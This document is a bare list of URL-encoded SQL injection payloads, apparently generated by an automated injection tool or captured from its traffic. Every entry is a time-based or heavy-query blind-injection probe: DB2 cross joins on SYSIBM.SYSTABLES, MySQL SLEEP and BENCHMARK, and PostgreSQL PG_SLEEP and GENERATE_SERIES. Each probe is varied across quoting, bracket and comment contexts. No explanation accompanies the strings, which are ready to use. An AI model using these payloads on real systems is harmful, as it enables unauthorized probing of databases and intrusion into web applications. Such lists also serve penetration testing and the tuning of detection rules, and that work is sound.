foo%27%7C%7C%28SELECT%20%27BcyC%27%20FROM%20DUAL%20WHERE%204939%3D4939%20AND%208333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20%29%7C%7C%27 foo%27%7C%7C%28SELECT%20%27Tzwh%27%20WHERE%204116%3D4116%20AND%208333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20%29%7C%7C%27 foo%27%2B%28SELECT%20EkAv%20WHERE%207638%3D7638%20AND%208333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20%29%2B%27 foo%27%2B%28SELECT%20%27uyjb%27%20WHERE%204915%3D4915%20AND%208333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20%29%2B%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%208333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20%23 foo%29%20AND%205950%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- foo%27%29%20AND%205950%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- foo%27%20AND%205950%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- foo%22%20AND%205950%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- foo%29%20AND%205950%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- foo%29%29%20AND%205950%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- foo%29%29%29%20AND%205950%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- foo%20AND%205950%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- foo%27%29%20AND%205950%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- foo%27%29%29%20AND%205950%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- foo%27%29%29%29%20AND%205950%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- foo%27%20AND%205950%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- foo%27%29%20AND%205950%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- foo%27%29%29%20AND%205950%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- foo%27%29%29%29%20AND%205950%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- foo%27%20AND%205950%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- foo%22%29%20AND%205950%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- foo%22%29%29%20AND%205950%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- foo%22%29%29%29%20AND%205950%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- foo%22%20AND%205950%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- foo%22%29%20AND%205950%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- foo%22%29%29%20AND%205950%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- foo%22%29%29%29%20AND%205950%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- foo%22%20AND%205950%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- foo%25%27%29%20AND%205950%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- foo%25%27%29%29%20AND%205950%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- foo%25%27%29%29%29%20AND%205950%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- foo%25%27%20AND%205950%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- foo%00%27%29%20AND%205950%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- foo%00%27%20AND%205950%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- foo%27%29%20WHERE%204339%3D4339%20AND%205950%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- foo%22%29%20WHERE%209030%3D9030%20AND%205950%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- foo%29%20WHERE%201355%3D1355%20AND%205950%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- foo%27%20WHERE%208483%3D8483%20AND%205950%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- foo%22%20WHERE%209955%3D9955%20AND%205950%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- foo%20WHERE%203852%3D3852%20AND%205950%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- foo%27%7C%7C%28SELECT%20%27RuFL%27%20FROM%20DUAL%20WHERE%203985%3D3985%20AND%205950%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- foo%27%7C%7C%28SELECT%20%27fUDI%27%20WHERE%209643%3D9643%20AND%205950%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- foo%27%2B%28SELECT%20DDvc%20WHERE%202064%3D2064%20AND%205950%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- foo%27%2B%28SELECT%20%27fosX%27%20WHERE%203341%3D3341%20AND%205950%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- foo%27%20IN%20BOOLEAN%20MODE%29%20AND%205950%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- -9752%29%20OR%203051%3DSLEEP%285%29 -5821%27%29%20OR%203051%3DSLEEP%285%29 -7388%27%20OR%203051%3DSLEEP%285%29 -6045%22%20OR%203051%3DSLEEP%285%29 -3759%29%20OR%203051%3DSLEEP%285%29%20AND%20%283323%3D3323 -7412%29%29%20OR%203051%3DSLEEP%285%29%20AND%20%28%288036%3D8036 -5453%29%29%29%20OR%203051%3DSLEEP%285%29%20AND%20%28%28%281668%3D1668 -2054%20OR%203051%3DSLEEP%285%29 -7412%27%29%20OR%203051%3DSLEEP%285%29%20AND%20%28%27oAsy%27%3D%27oAsy -6444%27%29%29%20OR%203051%3DSLEEP%285%29%20AND%20%28%28%27xvlU%27%3D%27xvlU -2696%27%29%29%29%20OR%203051%3DSLEEP%285%29%20AND%20%28%28%28%27cwkc%27%3D%27cwkc -5655%27%20OR%203051%3DSLEEP%285%29%20AND%20%27erjD%27%3D%27erjD -4986%27%29%20OR%203051%3DSLEEP%285%29%20AND%20%28%27zgUn%27%20LIKE%20%27zgUn -5822%27%29%29%20OR%203051%3DSLEEP%285%29%20AND%20%28%28%27CQpQ%27%20LIKE%20%27CQpQ -3067%27%29%29%29%20OR%203051%3DSLEEP%285%29%20AND%20%28%28%28%27NjKi%27%20LIKE%20%27NjKi -9064%27%20OR%203051%3DSLEEP%285%29%20AND%20%27xOuL%27%20LIKE%20%27xOuL -8104%22%29%20OR%203051%3DSLEEP%285%29%20AND%20%28%22ILaV%22%3D%22ILaV -1066%22%29%29%20OR%203051%3DSLEEP%285%29%20AND%20%28%28%22ceWQ%22%3D%22ceWQ -6610%22%29%29%29%20OR%203051%3DSLEEP%285%29%20AND%20%28%28%28%22ljAY%22%3D%22ljAY -8331%22%20OR%203051%3DSLEEP%285%29%20AND%20%22WTHD%22%3D%22WTHD -1665%22%29%20OR%203051%3DSLEEP%285%29%20AND%20%28%22zisp%22%20LIKE%20%22zisp -7442%22%29%29%20OR%203051%3DSLEEP%285%29%20AND%20%28%28%22sgHi%22%20LIKE%20%22sgHi -7081%22%29%29%29%20OR%203051%3DSLEEP%285%29%20AND%20%28%28%28%22UCDv%22%20LIKE%20%22UCDv -5165%22%20OR%203051%3DSLEEP%285%29%20AND%20%22sxGX%22%20LIKE%20%22sxGX -2905%25%27%29%20OR%203051%3DSLEEP%285%29%20AND%20%28%27%25%27%3D%27 -2437%25%27%29%29%20OR%203051%3DSLEEP%285%29%20AND%20%28%28%27%25%27%3D%27 -9302%25%27%29%29%29%20OR%203051%3DSLEEP%285%29%20AND%20%28%28%28%27%25%27%3D%27 -7375%25%27%20OR%203051%3DSLEEP%285%29%20AND%20%27%25%27%3D%27 -1632%00%27%29%20OR%203051%3DSLEEP%285%29%20AND%20%28%27gdtc%27%3D%27gdtc -8894%00%27%20OR%203051%3DSLEEP%285%29%20AND%20%27YCvQ%27%3D%27YCvQ -3726%27%29%20WHERE%205681%3D5681%20OR%203051%3DSLEEP%285%29%20--%20 -2487%22%29%20WHERE%202576%3D2576%20OR%203051%3DSLEEP%285%29%20--%20 -3867%29%20WHERE%208698%3D8698%20OR%203051%3DSLEEP%285%29%20--%20 -3627%27%20WHERE%203968%3D3968%20OR%203051%3DSLEEP%285%29%20--%20 -5518%22%20WHERE%208780%3D8780%20OR%203051%3DSLEEP%285%29%20--%20 -6460%20WHERE%205355%3D5355%20OR%203051%3DSLEEP%285%29%20--%20 -7832%29%20OR%208813%3DBENCHMARK%285000000%2CMD5%280x66556262%29%29 -6377%27%29%20OR%208813%3DBENCHMARK%285000000%2CMD5%280x66556262%29%29 -7935%27%20OR%208813%3DBENCHMARK%285000000%2CMD5%280x66556262%29%29 -3554%22%20OR%208813%3DBENCHMARK%285000000%2CMD5%280x66556262%29%29 -1613%29%20OR%208813%3DBENCHMARK%285000000%2CMD5%280x66556262%29%29%20AND%20%285041%3D5041 -1981%29%29%20OR%208813%3DBENCHMARK%285000000%2CMD5%280x66556262%29%29%20AND%20%28%285782%3D5782 -7476%29%29%29%20OR%208813%3DBENCHMARK%285000000%2CMD5%280x66556262%29%29%20AND%20%28%28%286245%3D6245 -5118%20OR%208813%3DBENCHMARK%285000000%2CMD5%280x66556262%29%29 -9286%27%29%20OR%208813%3DBENCHMARK%285000000%2CMD5%280x66556262%29%29%20AND%20%28%27bhoz%27%3D%27bhoz -2011%27%29%29%20OR%208813%3DBENCHMARK%285000000%2CMD5%280x66556262%29%29%20AND%20%28%28%27BnIY%27%3D%27BnIY -7005%27%29%29%29%20OR%208813%3DBENCHMARK%285000000%2CMD5%280x66556262%29%29%20AND%20%28%28%28%27MfCX%27%3D%27MfCX -6931%27%20OR%208813%3DBENCHMARK%285000000%2CMD5%280x66556262%29%29%20AND%20%27bPUe%27%3D%27bPUe -6181%27%29%20OR%208813%3DBENCHMARK%285000000%2CMD5%280x66556262%29%29%20AND%20%28%27VrhI%27%20LIKE%20%27VrhI -5018%27%29%29%20OR%208813%3DBENCHMARK%285000000%2CMD5%280x66556262%29%29%20AND%20%28%28%27bZRm%27%20LIKE%20%27bZRm -5493%27%29%29%29%20OR%208813%3DBENCHMARK%285000000%2CMD5%280x66556262%29%29%20AND%20%28%28%28%27RJTv%27%20LIKE%20%27RJTv -6061%27%20OR%208813%3DBENCHMARK%285000000%2CMD5%280x66556262%29%29%20AND%20%27bgBh%27%20LIKE%20%27bgBh -8490%22%29%20OR%208813%3DBENCHMARK%285000000%2CMD5%280x66556262%29%29%20AND%20%28%22QoXS%22%3D%22QoXS -4700%22%29%29%20OR%208813%3DBENCHMARK%285000000%2CMD5%280x66556262%29%29%20AND%20%28%28%22SMzz%22%3D%22SMzz -9456%22%29%29%29%20OR%208813%3DBENCHMARK%285000000%2CMD5%280x66556262%29%29%20AND%20%28%28%28%22xXsz%22%3D%22xXsz -9514%22%20OR%208813%3DBENCHMARK%285000000%2CMD5%280x66556262%29%29%20AND%20%22uirI%22%3D%22uirI -1870%22%29%20OR%208813%3DBENCHMARK%285000000%2CMD5%280x66556262%29%29%20AND%20%28%22PLPQ%22%20LIKE%20%22PLPQ -7054%22%29%29%20OR%208813%3DBENCHMARK%285000000%2CMD5%280x66556262%29%29%20AND%20%28%28%22iYFh%22%20LIKE%20%22iYFh -5997%22%29%29%29%20OR%208813%3DBENCHMARK%285000000%2CMD5%280x66556262%29%29%20AND%20%28%28%28%22kSJt%22%20LIKE%20%22kSJt -3489%22%20OR%208813%3DBENCHMARK%285000000%2CMD5%280x66556262%29%29%20AND%20%22ijoa%22%20LIKE%20%22ijoa -9322%25%27%29%20OR%208813%3DBENCHMARK%285000000%2CMD5%280x66556262%29%29%20AND%20%28%27%25%27%3D%27 -8091%25%27%29%29%20OR%208813%3DBENCHMARK%285000000%2CMD5%280x66556262%29%29%20AND%20%28%28%27%25%27%3D%27 -4408%25%27%29%29%29%20OR%208813%3DBENCHMARK%285000000%2CMD5%280x66556262%29%29%20AND%20%28%28%28%27%25%27%3D%27 -4007%25%27%20OR%208813%3DBENCHMARK%285000000%2CMD5%280x66556262%29%29%20AND%20%27%25%27%3D%27 -9155%00%27%29%20OR%208813%3DBENCHMARK%285000000%2CMD5%280x66556262%29%29%20AND%20%28%27jlhP%27%3D%27jlhP -7137%00%27%20OR%208813%3DBENCHMARK%285000000%2CMD5%280x66556262%29%29%20AND%20%27fLdm%27%3D%27fLdm -5350%27%29%20WHERE%202800%3D2800%20OR%208813%3DBENCHMARK%285000000%2CMD5%280x66556262%29%29%20--%20 -6314%22%29%20WHERE%209257%3D9257%20OR%208813%3DBENCHMARK%285000000%2CMD5%280x66556262%29%29%20--%20 -5066%29%20WHERE%206199%3D6199%20OR%208813%3DBENCHMARK%285000000%2CMD5%280x66556262%29%29%20--%20 -5360%27%20WHERE%205917%3D5917%20OR%208813%3DBENCHMARK%285000000%2CMD5%280x66556262%29%29%20--%20 -2983%22%20WHERE%209806%3D9806%20OR%208813%3DBENCHMARK%285000000%2CMD5%280x66556262%29%29%20--%20 -2957%20WHERE%207763%3D7763%20OR%208813%3DBENCHMARK%285000000%2CMD5%280x66556262%29%29%20--%20 -1157%29%20OR%204236%3D%28SELECT%204236%20FROM%20PG_SLEEP%285%29%29 -7437%27%29%20OR%204236%3D%28SELECT%204236%20FROM%20PG_SLEEP%285%29%29 -8653%27%20OR%204236%3D%28SELECT%204236%20FROM%20PG_SLEEP%285%29%29 -2447%22%20OR%204236%3D%28SELECT%204236%20FROM%20PG_SLEEP%285%29%29 -4525%29%20OR%204236%3D%28SELECT%204236%20FROM%20PG_SLEEP%285%29%29%20AND%20%289384%3D9384 -6554%29%29%20OR%204236%3D%28SELECT%204236%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%284936%3D4936 -6992%29%29%29%20OR%204236%3D%28SELECT%204236%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%281559%3D1559 -8528%20OR%204236%3D%28SELECT%204236%20FROM%20PG_SLEEP%285%29%29 -7792%27%29%20OR%204236%3D%28SELECT%204236%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27ZCco%27%3D%27ZCco -5538%27%29%29%20OR%204236%3D%28SELECT%204236%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%27YaFb%27%3D%27YaFb -5290%27%29%29%29%20OR%204236%3D%28SELECT%204236%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%27NRYn%27%3D%27NRYn -1551%27%20OR%204236%3D%28SELECT%204236%20FROM%20PG_SLEEP%285%29%29%20AND%20%27CCNw%27%3D%27CCNw -3046%27%29%20OR%204236%3D%28SELECT%204236%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27HkCR%27%20LIKE%20%27HkCR -4837%27%29%29%20OR%204236%3D%28SELECT%204236%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%27YvCR%27%20LIKE%20%27YvCR -5503%27%29%29%29%20OR%204236%3D%28SELECT%204236%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%27cPyv%27%20LIKE%20%27cPyv -4179%27%20OR%204236%3D%28SELECT%204236%20FROM%20PG_SLEEP%285%29%29%20AND%20%27HiIX%27%20LIKE%20%27HiIX -7397%22%29%20OR%204236%3D%28SELECT%204236%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%22BPir%22%3D%22BPir -3996%22%29%29%20OR%204236%3D%28SELECT%204236%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%22lSKX%22%3D%22lSKX -6391%22%29%29%29%20OR%204236%3D%28SELECT%204236%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%22QBAC%22%3D%22QBAC -6177%22%20OR%204236%3D%28SELECT%204236%20FROM%20PG_SLEEP%285%29%29%20AND%20%22DSFq%22%3D%22DSFq -4864%22%29%20OR%204236%3D%28SELECT%204236%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%22MznD%22%20LIKE%20%22MznD -6098%22%29%29%20OR%204236%3D%28SELECT%204236%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%22gQhy%22%20LIKE%20%22gQhy -2351%22%29%29%29%20OR%204236%3D%28SELECT%204236%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%22gTQO%22%20LIKE%20%22gTQO -8573%22%20OR%204236%3D%28SELECT%204236%20FROM%20PG_SLEEP%285%29%29%20AND%20%22musY%22%20LIKE%20%22musY -4341%25%27%29%20OR%204236%3D%28SELECT%204236%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27%25%27%3D%27 -3938%25%27%29%29%20OR%204236%3D%28SELECT%204236%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%27%25%27%3D%27 -2054%25%27%29%29%29%20OR%204236%3D%28SELECT%204236%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%27%25%27%3D%27 -8032%25%27%20OR%204236%3D%28SELECT%204236%20FROM%20PG_SLEEP%285%29%29%20AND%20%27%25%27%3D%27 -8051%00%27%29%20OR%204236%3D%28SELECT%204236%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27zeKk%27%3D%27zeKk -5900%00%27%20OR%204236%3D%28SELECT%204236%20FROM%20PG_SLEEP%285%29%29%20AND%20%27oVWr%27%3D%27oVWr -3400%27%29%20WHERE%201554%3D1554%20OR%204236%3D%28SELECT%204236%20FROM%20PG_SLEEP%285%29%29%20--%20 -6751%22%29%20WHERE%204664%3D4664%20OR%204236%3D%28SELECT%204236%20FROM%20PG_SLEEP%285%29%29%20--%20 -6084%29%20WHERE%209387%3D9387%20OR%204236%3D%28SELECT%204236%20FROM%20PG_SLEEP%285%29%29%20--%20 -9788%27%20WHERE%201969%3D1969%20OR%204236%3D%28SELECT%204236%20FROM%20PG_SLEEP%285%29%29%20--%20 -7974%22%20WHERE%208883%3D8883%20OR%204236%3D%28SELECT%204236%20FROM%20PG_SLEEP%285%29%29%20--%20 -4749%20WHERE%209256%3D9256%20OR%204236%3D%28SELECT%204236%20FROM%20PG_SLEEP%285%29%29%20--%20 -8495%29%20OR%201110%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 -7722%27%29%20OR%201110%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 -1733%27%20OR%201110%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 -2201%22%20OR%201110%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 -4998%29%20OR%201110%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%283708%3D3708 -8715%29%29%20OR%201110%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%281576%3D1576 -7666%29%29%29%20OR%201110%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%281797%3D1797 -4265%20OR%201110%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 -5391%27%29%20OR%201110%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%27iFpv%27%3D%27iFpv -3622%27%29%29%20OR%201110%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%27ivTA%27%3D%27ivTA -6018%27%29%29%29%20OR%201110%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%27LqPw%27%3D%27LqPw -7280%27%20OR%201110%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%27NWwI%27%3D%27NWwI -7308%27%29%20OR%201110%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%27yXzd%27%20LIKE%20%27yXzd -6155%27%29%29%20OR%201110%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%27PdcU%27%20LIKE%20%27PdcU -7910%27%29%29%29%20OR%201110%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%27uZMy%27%20LIKE%20%27uZMy -6972%27%20OR%201110%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%27DzZR%27%20LIKE%20%27DzZR -1633%22%29%20OR%201110%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%22FpLh%22%3D%22FpLh -2673%22%29%29%20OR%201110%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%22pVzQ%22%3D%22pVzQ -5482%22%29%29%29%20OR%201110%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%22yvKU%22%3D%22yvKU -4706%22%20OR%201110%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%22SKvm%22%3D%22SKvm -4763%22%29%20OR%201110%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%22WgyD%22%20LIKE%20%22WgyD -2877%22%29%29%20OR%201110%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%22EHjj%22%20LIKE%20%22EHjj -6738%22%29%29%29%20OR%201110%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%22OLOg%22%20LIKE%20%22OLOg -4185%22%20OR%201110%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%22TYJP%22%20LIKE%20%22TYJP -5384%25%27%29%20OR%201110%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%27%25%27%3D%27 -9589%25%27%29%29%20OR%201110%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%27%25%27%3D%27 -8110%25%27%29%29%29%20OR%201110%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%27%25%27%3D%27 -6678%25%27%20OR%201110%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%27%25%27%3D%27 -2442%00%27%29%20OR%201110%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%27kxRP%27%3D%27kxRP 